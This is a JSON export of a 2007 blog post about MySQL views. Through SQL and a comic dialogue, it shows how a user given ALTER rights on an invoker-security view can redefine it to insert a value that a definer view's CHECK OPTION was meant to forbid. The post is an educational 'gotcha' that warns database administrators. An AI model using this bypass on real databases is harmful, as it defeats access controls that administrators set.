{"id":57,"date":"2007-07-06T14:07:15","date_gmt":"2007-07-06T20:07:15","guid":{"rendered":"http:\/\/thenoyes.com\/littlenoise\/?p=57"},"modified":"2007-07-06T14:07:15","modified_gmt":"2007-07-06T20:07:15","slug":"views-and-social-engineering","status":"publish","type":"post","link":"https:\/\/thenoyes.com\/littlenoise\/?p=57","title":{"rendered":"Views and Social Engineering"},"content":{"rendered":"
\r\nCREATE TABLE secretData (\r\n    secretValue int COMMENT 'If this goes over 5, WWIII will start'\r\n);\r\n\r\nCREATE SQL SECURITY DEFINER VIEW censoredData AS \r\nSELECT * FROM secretData WHERE secretValue < 5 WITH CHECK OPTION;\r\n\r\nGRANT SELECT, INSERT ON test.censoredData TO 'evilFiend'@'%';\r\n<\/pre>\n
<telephone> ring ring<\/p>\n
<sysadmin> \"Hello?\"<\/p>\n
<evilFiend> \"I'd like to create an insertable view on some tables I already have rights to. I don't know just yet what I'll use for my select statement.\"<\/p>\n
<sysadmin> \"Ok. I'll set it up so you can do what you'd like.\"<\/p>\n
\r\nCREATE SQL SECURITY INVOKER VIEW evilFiendsView AS SELECT 1;\r\nGRANT SELECT, INSERT, ALTER ON test.evilFiendsView TO 'evilFiend'@'%';\r\n<\/pre>\n
\"Evil<\/p>\n
evilFiend connects to the server, while twiddling the end of his handlebar mustache.<\/p>\n
\r\nALTER VIEW evilFiendsView AS \r\nSELECT * FROM censoredData WITH LOCAL CHECK OPTION;\r\n\r\nINSERT INTO evilFiendsView VALUES (42);\r\n<\/pre>\n
Muhahaha!<\/p>\n","protected":false},"excerpt":{"rendered":"
CREATE TABLE secretData ( secretValue int COMMENT ‘If this goes over 5, WWIII will start’ ); CREATE SQL SECURITY DEFINER VIEW censoredData AS SELECT * FROM secretData WHERE secretValue < 5 WITH CHECK OPTION; GRANT SELECT, INSERT ON test.censoredData TO 'evilFiend'@'%'; <telephone> ring ring <sysadmin> \"Hello?\" <evilFiend> \"I'd like to create an insertable view on […]\n<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[6],"tags":[],"class_list":["post-57","post","type-post","status-publish","format-standard","hentry","category-gotchas"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p2IBF1-V","jetpack_sharing_enabled":true,"jetpack-related-posts":[],"_links":{"self":[{"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=\/wp\/v2\/posts\/57","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=57"}],"version-history":[{"count":0,"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=\/wp\/v2\/posts\/57\/revisions"}],"wp:attachment":[{"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=57"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=57"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thenoyes.com\/littlenoise\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=57"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}